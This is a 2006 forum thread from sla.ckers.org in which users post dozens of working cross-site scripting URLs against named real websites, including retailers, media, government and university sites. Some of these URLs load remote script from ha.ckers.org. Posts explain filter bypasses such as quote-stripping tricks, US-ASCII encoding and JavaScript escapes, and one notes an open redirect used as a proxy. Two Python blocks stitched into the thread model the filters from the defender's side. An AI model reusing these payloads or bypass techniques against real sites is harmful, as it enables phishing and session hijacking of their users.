Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 24 of 65
Re: So it begins
Posted by: rsnake
Date: November 03, 2006 11:15PM

http://www.merck.com/mrksearch/SearchServlet?HeaderImage=&HeaderImageAlt=&qt=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 04, 2006 12:06AM

http://search.lilly.com/search_result.jsp?QueryText=%22%3E%3Cscript%20src=http://ha.ckers.org/xss.js%20&query=natural&MaxDocs=50&ResultCount=10&QueryStartYear=Year&scope=lilly&scope=&ResultStart=1&ViewTemplate=docread.jsp&sectionName=Search&Coll=&adv=Y&Summaries=1&Sortspec=Score&Order=asc&QueryStartMonth=01&QueryEndMonth=12&QueryEndYear=Year

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 04, 2006 12:10AM

http://www.sogou.com/sohu?query=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&pid=sohu&rid=01001400&md=listTopics&name=%22%3Easdf&mode=0&sogouhome=&shuru=shou

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 04, 2006 12:14AM

http://search.espn.go.com/keyword/search?searchString=%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E&Find.x=0&Find.y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 04, 2006 12:15AM

https://www.adwaresystems.com/AdClock6/servlet.Login?CURRENTPAGE=Login.jsp&LOGINPAGENAME=Login.jsp&command=logon&user=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 04, 2006 12:19AM

Love their campaign - Anti-spyware, anti-virus, anti-popups, but what about the anti-XSS? Killing quotes just doesn't cut it. http://search.earthlink.net/search?area=earthlink-ss&q=%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E&channel=www&cgid=1&li=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 04, 2006 07:08PM

This is one of the hardest ones I've come across in a while: http://www.costco.com/Common/Search.aspx?whse=BC&topnav=&search=%3C%27/script%3E%3C%27script%3Ealert%28%22XSS%22%29%3C%27/script%3E&N=0&Ntt=%3C%27/script%3E%3C%27script%3Ealert%28%22XSS%22%29%3C%27/script%3E&cm_re=1-_-Top_Left_Nav-_-Top_search

Basically they don't allow certain things (keywords) like <script> etc... which we can get around in certain ways, but it also encapsulates things in single quotes too. Eesh... But jumping out of single quotes isn't possible because they remove them! So... what if we embed single quotes inside the keywords that they remove. Aha! They remove the single quotes and leave the keywords, so I can jump out of the JavaScript with an end <'/script> tag which gets turned into </script> and by following that up by a <'script>alert("XSS")<'/script> which gets turned into a <script>alert("XSS")</script> tag we have our working vector. Whew! I thought I was losing it there for a minute. Cross site scripting is an art as much as it is a science.

- RSnake
Gotta love it. http://ha.ckers.org

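The Costco post above describes a filter that strips tag keywords and then strips single quotes, in that order. The following is an added example (not the forum's or Costco's code) that models that two-pass filter as an assumption, shows why the order of the passes reassembles the tag, and contrasts it with context-aware encoding into a JS string literal, which needs no keyword blacklist at all:

```python
import json
import re

# Constructed model of the two-pass filter the post describes (an assumption,
# not Costco's real code): blacklisted keywords are removed first, then single
# quotes, each in a single non-repeating pass.
KEYWORDS = ("<script>", "</script>")

def blacklist_filter(value: str) -> str:
    for kw in KEYWORDS:
        value = value.replace(kw, "")
    # Removing quotes AFTER the keyword pass turns "<'script>" into "<script>",
    # which is exactly the bypass reported in the post.
    return value.replace("'", "")

def fixpoint_filter(value: str) -> str:
    # Re-running the filter until its output stops changing closes this
    # ordering hole; a keyword blacklist is still fragile, though.
    while True:
        out = blacklist_filter(value)
        if out == value:
            return out
        value = out

def naive_quote(value: str) -> str:
    # What the page effectively did: filtered value dropped into '...'.
    return "'" + blacklist_filter(value) + "'"

def js_string_literal(value: str) -> str:
    # Encode for the output context instead of filtering: a JSON string is a
    # valid JS literal, and hiding "<", ">" and "&" as \u escapes means a
    # "</script>" inside the value can no longer end the enclosing script
    # block. The JS engine decodes \u003c back to "<" only inside the string
    # value, never into markup.
    lit = json.dumps(value)
    return (lit.replace("<", "\\u003c")
               .replace(">", "\\u003e")
               .replace("&", "\\u0026"))

def render(value: str, encoder) -> str:
    return "<script>var q = " + encoder(value) + ";</script>"

def script_tag_count(markup: str) -> int:
    # One opening tag is the legitimate wrapper; any more came from the value.
    return len(re.findall(r"<script\b", markup, re.I))

def roundtrip_ok(value: str) -> bool:
    # The encoded literal still decodes to the original value.
    return json.loads(js_string_literal(value)) == value

# The vector from the post, as a constructed sample.
VECTOR = "<'/script><'script>alert(\"XSS\")<'/script>"
```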
Re: So it begins
Posted by: id
Date: November 04, 2006 07:16PM

Much as writing sentences that aren't run-on is an art...

/zing!

-id

Re: So it begins
Posted by: rsnake
Date: November 04, 2006 07:19PM

Wow, you got me there, ouch. Meanwhile, back to the pwnage:

http://giftregistry.kmart.com/webapp/wcs/stores/servlet/GiftRegistrySearchResultsView?storeId=10151&catalogId=10051&maxResultsPerPage=10&maxResults=50&sortBy=4&startIndex=0&findSimilarMatches=&searchOtherRegistry=true&firstName=%22%3E%3CIMG%20SRC=%22%22%20onerror=alert(%22XSS%22)%3E&lastName=blah&externalId=

If you enter in <script> it gives you a nice little error message about the servers thinking your request is malicious. No, it's informational only. Malicious would be using it to phish people. Silly computers.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 04, 2006 07:22PM

http://www.michaels.com/art/online/search?pageNumber=1&channel=0&search=yes&keywords=--%3E%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&type=0&x=0&y=0

Another interesting one where I had to jump out of the comment to end the script tag. People who write well formed JavaScript are a rare breed these days. I almost forgot what it's really supposed to look like (minus my vector of course):

<script language="javascript1.1">
<!--
var cm = new _cm("tid", "1", "vn2", "e3.1");
cm.pi = getFileNameFromURL();
cm.se = "--></script><script>alert(String.fromCharCode(88,83,83))</script>";
cm.writeImg();
//-->
</script>

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: id
Date: November 04, 2006 07:23PM

I'm at the bar, pretty drunk by now, trying to fix the and make irc secure, I get to be incoherent.

-id

Re: So it begins
Posted by: rsnake
Date: November 04, 2006 07:30PM

What's your excuse the rest of the time?

/zing!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: November 04, 2006 07:34PM

Oh btw, why doesn't this work?

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://giftregistry.kmart.com/webapp/wcs/stores/servlet/GiftRegistrySearchResultsView&storeId=10151&catalogId=10051&externalId=%22%3E%3CBODY%20onLoad%3D%22alert('xss')%22%3E

- Kyran

Re: So it begins
Posted by: rsnake
Date: November 04, 2006 07:45PM

I think it's because the onload event handler for the body tag is defined above. There is some really crazy (poor) HTML on that page, it's tough to tell.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: November 04, 2006 07:45PM

well the first (maybe not only) problem is that there already is an onload event.
<body onload="fnSetFocus();">

You can't inject <body onload="alert(1)"> and overwrite any existing onload events sadly :/

-maluc

Re: So it begins
Posted by: rsnake
Date: November 05, 2006 12:15AM

http://search.ft.com/searchResults?queryText=%22));alert(%22XSS%22);//&x=0&y=0&javascriptEnabled=true

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: November 05, 2006 12:22AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://tmc.tippingpoint.com/TMC/SendUserName&emailaddress=1%3Cscript%3Ealert('xss')%3C/script%3E <- TippingPoint via POST. Ouch.

- Kyran

Re: So it begins
Posted by: rsnake
Date: November 05, 2006 12:40AM

Serious pain in the ass on this one as no open angle brackets were allowed. Had to inject it into the DoubleClick code output. Then the huge mess of characters at the beginning are to get it to error out to this page. I'm sure there are easier places to inject XSS into on this site, but once I got started there was no turning back: http://www.marketwatch.com/tools/quotes/quotes.asp?symb=blablablahasdaslkdfjlkasjdfasdlkfjlaksjdflkjaslkdfjkajsdhfkjhaskjdfhkjashdfkjhkajshdfsd%22%3E%5Cu003C/iframe%5Cu003E%5Cu003Cscript%20src=http://ha.ckers.org/xss.js%3E%22);//

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 11/05/2006 12:41AM by rsnake.

Re: So it begins
Posted by: rsnake
Date: November 05, 2006 01:16AM

https://www.girlsgonewild.com/index.cfm?action=checkout.cartprocess&quantity_mode=absolute&item_mode_upsell=&item_code_upsell=&item_quantity_upsell=&OCcode=&shipping_option_id=2&Salutation=-----&firstname=&lastname=&email=&shipping_phone_areacode=&shipping_phone_prefix=&shipping_phone_linenumber=&shipping_address1=%22%3E%3Cscript%3Ealert(%22HaX0rz%20gone%20wild%22)%3C/script%3E&shipping_address2=&shipping_city=&shipping_state=&shipping_zip=&shipping_country_code=US&save=CHECK+OUT

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: November 05, 2006 01:17AM

http://www.marketwatch.com/news/story/Story.aspx?guid=%7BB98F74D2%2DF404%2D4A56%2DBE84%2D85889FB20976%7D&siteid=asdf%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss'%29 too.. and you probably could've used style injection there too? that's one ugly looking vector ^^

be warned: that popped up 72 alert boxes for me.. i'm not exaggerating.

-maluc



Edited 1 time(s). Last edit at 11/05/2006 01:18AM by maluc.

Re: So it begins
Posted by: maluc
Date: November 05, 2006 01:25AM

http://www.marketwatch.com/support/feedback.asp?siteid=asdf%22;alert(%22XSS%22);e=%22

3 popups

-maluc

Re: So it begins
Posted by: maluc
Date: November 05, 2006 07:27AM

IE only, using US-ASCII encoding injection
http://search.hhs.gov/search?q=asdf%A2%BE%BCscript%BEalert(%A2XSS%A2)%BC/script%BE%BCx&Submit=Search&ie=&site=HHS&output=xml_no_dtd&client=HHS&lr=&proxystylesheet=HHS&oe=US-ASCII

normal
http://search.hhs.gov/search?output=xml&proxystylesheet=HHS%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

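Both the marketwatch.com post above (no literal "<" allowed, so \u003C inside a JS string) and the hhs.gov US-ASCII post show a filter inspecting the bytes as sent while the browser interprets them differently. As an added example, not code from the forum or from either site, the block below normalizes a raw query value into the views a browser would see (7-bit US-ASCII as older IE rendered it, and JS string escapes) before looking for a script tag; the samples are constructed from the two posts with the script host replaced. The real fix on the server is an explicit charset in Content-Type plus per-context output encoding; this check is for log review and detection.

```python
import re
from urllib.parse import unquote_to_bytes

def naive_open_bracket_check(raw_query_value: str) -> bool:
    # Filter of the kind both posts ran into: look for a literal "<" in the
    # URL-decoded bytes and nothing else. Returns True when it would block.
    return "<" in unquote_to_bytes(raw_query_value).decode("latin-1")

def ie_us_ascii_view(data: bytes) -> str:
    # Older IE rendered a page labelled US-ASCII as 7-bit text, dropping the
    # high bit of every byte: 0xBC -> "<", 0xBE -> ">", 0xA2 -> '"'.
    return bytes(b & 0x7F for b in data).decode("ascii")

def js_string_view(text: str) -> str:
    # Inside a JS string literal the engine turns \u003C into "<"; if the page
    # later document.write()s that string, the browser parses it as markup.
    return re.sub(r"\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), text)

def normalized_views(raw_query_value: str) -> dict:
    data = unquote_to_bytes(raw_query_value)
    literal = data.decode("latin-1")
    return {
        "literal": literal,
        "us_ascii_7bit": ie_us_ascii_view(data),
        "js_string": js_string_view(literal),
    }

def flags_script_injection(raw_query_value: str) -> bool:
    # Defender-side check: a script tag in ANY browser-side interpretation
    # counts, not only in the bytes as sent.
    tag = re.compile(r"<\s*/?\s*script", re.I)
    return any(tag.search(v) for v in normalized_views(raw_query_value).values())

# Constructed samples modelled on the two posts (script host replaced by x.js).
US_ASCII_SAMPLE = "asdf%A2%BE%BCscript%BEalert(%A2XSS%A2)%BC/script%BE%BCx"
JS_ESCAPE_SAMPLE = "%22%3E%5Cu003C/iframe%5Cu003E%5Cu003Cscript%20src=x.js%3E%22);//"
```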
Re: So it begins
Posted by: rsnake
Date: November 05, 2006 12:29PM

Nice job on the US-ASCII encoding one. That's exactly what I was talking about in my blog post the other day.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: November 05, 2006 12:50PM

indeed, it was a timely post ^^

either that or they're more common than i realize.. stumbled upon it without trying

-maluc

Re: So it begins
Posted by: Kyran
Date: November 06, 2006 07:16PM

http://www.demonoid.com/redirect.php?url='><script>alert('Torrents%20are%20bad');</script>

- Kyran

Re: So it begins
Posted by: maluc
Date: November 07, 2006 04:39AM

http://www.animelyrics.tv/subscribe.asp?name=applesauce&email=asdf%3Cscript%3Ealert%28%22You+have+XSS+here%22%29%3C%2Fscript%3E

it gets added to their mailing list.. so try not to click it too much :x

-maluc

Re: So it begins
Posted by: maluc
Date: November 07, 2006 05:15AM

university list:

http://whitepages.med.harvard.edu/WhitePagesPublic.asp?task=mysearch&db=hms&Last_Name=%22%3E%3Cscript%3Ealert(%22Go%20To%20Stanford%22)%3C/script%3E%3Cx
http://stanfordwho.stanford.edu/lookup?search=qwer%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%3Bxx:expression(alert('XSS'))&submit=Search
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://cypress.csuchico.edu/APO/WebDocs/Directory/LookupLocation.asp&Building=25MST&Room=here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E cypress.csuchico.edu
http://www.cornell.edu/print.cfm?page=http://www.google.com/local_url?q=http://maluc.sitesled.com/xss.html whitelisting google + a google open redirect = open proxy.
https://utdirect.utexas.edu/nlogon/vip/ogif.WBX?referring_url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20e=%22 seems to not load sometimes.. might be inadvertently DoSing it or its IPS hates me.
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://map.ais.ucla.edu/portal/site/UCLA/menuitem.cfbd3d7d013be6a5ec9b87105d66344a/%3fjavax.portlet.tpst=414a0e597bcc1105313b8c105d66344a_ws_MX&javax.portlet.prp_414a0e597bcc1105313b8c105d66344a_viewID=RESULT_SET_VIEW&javax.portlet.begCacheTok=token&javax.portlet.endCacheTok=token&eng=autonomyUCLA&qt=asdf%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Submit.x=0&Submit.y=0&Submit=Search map.ais.ucla.edu
https://www1.baylor.edu/courselistings/ListCourses.aspx?Level=college&Term_CC=20&Term=035&TermDesc=2003_-_Wintasdf%22style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22%20x=
http://web.mit.edu/bin/cgicso?query=--%3E%3Cscript%3Ealert(%22Go%20to%20harvard%22)%3C/script%3E%3C!--x
https://kb.berkeley.edu/cgi-bin/help_referral.pl?articleTitle=%3Cscript%3Ealert(%22Go%20to%20MIT%22)%3C/script%3E%3Cx
http://search.caltech.edu/search?q=grandma%20porn!%3Cscript%3Ealert(%22Go%20to%20Berkeley%22)%3C/script%3E&site=Caltechweb&output=xml_no_dtd&client=Caltechweb&proxystylesheet=Caltechweb
http://www.googlesyndicatedsearch.com/u/PrincetonNew?q=%22%3E%3Cscript%3Ealert(%22Go%20to%20UT%22)%3C/script%3E%3Cx not actually princeton's domain, but could be of some use

-maluc



Edited 10 time(s). Last edit at 11/07/2006 07:54AM by maluc.

Re: So it begins
Posted by: maluc
Date: November 07, 2006 06:07AM

http://www.alsa.org/print.cfm?title=%3C/title%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&URL=alsa%2Fleaders.cfm%3F%3Cscript%3Ealert(String.fromCharCode(88,83,83,50))%3C/script%3E
http://www.cast.org/teachingeverystudent/ideas/print.cfm?name=Uh%20Oh%3Cscript%3Ealert(%22Uh%20Oh%22)%3C/script%3E&r_id=-1

-maluc



Edited 1 time(s). Last edit at 11/07/2006 06:20AM by maluc.

Re: So it begins
Posted by: maluc
Date: November 07, 2006 06:16AM

http://www.furl.net/urlInfo.jsp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx

-maluc

Re: So it begins
Posted by: maluc
Date: November 07, 2006 06:50AM

http://www.texassports.com/index.php?s=asdf%22%3E%3Cscript%3Ealert(%22A%20lot%20of%20alerts..%22)%3C/script%3E%3Cx&change_well_id=2&url_article_id=2406

56 alerts by my count..

-maluc
